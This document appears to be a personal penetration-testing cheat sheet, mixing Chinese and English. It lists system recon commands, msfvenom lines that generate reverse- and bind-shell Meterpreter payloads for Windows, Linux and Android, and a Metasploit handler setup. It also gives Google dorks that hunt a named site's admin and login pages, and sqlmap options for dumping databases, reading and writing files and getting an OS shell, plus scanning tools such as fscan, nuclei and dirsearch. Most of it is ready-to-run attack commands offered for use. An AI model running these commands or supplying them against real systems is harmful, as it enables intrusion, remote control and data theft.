windows
whoami
ver
ipconfig /all
netstat -ano
tasklist /svc
netstat -anpt | findstr 15420
taskkill /pid 14396 -t -f
linux
whoami
uname -a
ifconfig
netstat -ano
ps -ef
netstat -anpt | grep 15420
grep "" /root/1.txt 文件内容搜索
find / -name "" 文件名搜索
kill -9 15420
kill -9 -15420
ls -al /root
mkdir rmdir
touch rm
rm -rf
chmod 777 xx
tar -zxvf xx.tar.gz
tar -cvf xx
cat 1.txt >> 2.txt
echo "123" > 2.txt
>>追加 > 覆盖
python开启 web服务
python3 -m http.server -d /root/http 8000
lsof /root/xx
lsof -p pid
vim /etc/hosts
msf
msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o shell.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/bind_https LHOST=10.211.55.2 LPORT=3333 -f elf -o shell.elf
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -o test.apk
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6688
shell
upload
download
background
sessions
sessions -i 1
域
hostname -I
检索分配的所有IP地址
fscan
fscan -h x.x.x.x/24
fscan -h x.x.x.x/18 -np 低权限
谷歌语法
site:heimian.com intext: 管理 | 后台 | 登陆 | 用户名 | 密码 | 验证码系统 | 帐号 | manage l admin l login l system
site:heimian.com inurl:login l admin | manage | manager | admin_login | login_admin l system
site:heimian.com intitle:管理 | 后台 | 登陆 |
site:heimian.com intext:验证码
搜集一些基本信息
在地址后面逐-添加info.php phpinfo.php test.php 找到 php统计配置信息
工具
sqlmap
sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1"
sqlmap -r 1.txt
--is-dba
--dbs
-D xx --tables
-D xx -T xx --columns
-D xx -T xx -C xx --dump
--tamper=unmagicquotes.py 魔术引号
--file-read "c:/a.txt"
--file-write "1.txt" --file-dest "c:/123.txt"
--os-shell
python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --technique EB
B:Boolean-based blind(布尔型注入)
E:Error-based(报错型注入)
U:Union query-based(可联合查询注入)
S:Stacked queries(可多语句查询注入)
T:Time-based blind(基于时间延迟注入)
Q:Inline queries(嵌套查询注入)
nuclei
nuclei -l 1.txt -o 2.txt -t 1.yaml
nuclei -up # 更新 nuclei
nuclei -ut # 更新脚本
xray
xray webscan --basic-crawler http://example.com --html-output xxx.html
docker
docker compose up -d
docker compose down
docker ps
docker images
docker exec -it ddd2455b42ab bash
docker run
docker rm xxx
docker start xxx
docker stop xxx
oneforall
python oneforall.py --target baidu.com run
python oneforall.py --targets ./domains.txt run
httpx
httpx -u https://x.x.x.x
httpx -l 1.txt -o 2.txt
nmap
nmap xxxxx -sS -A
dirsearch
python3 dirsearch.py -u https://x.x.x.x
python3 dirsearch.py -l 1.txt -t 15
Ehole
Ehole finger -u 104.21.65.37
Ehole finger -l 1.txt
Ehole finger -f 104.21.65.37 只支持ip
Ehole finger -s "baidu.com" 支持fofa所有语法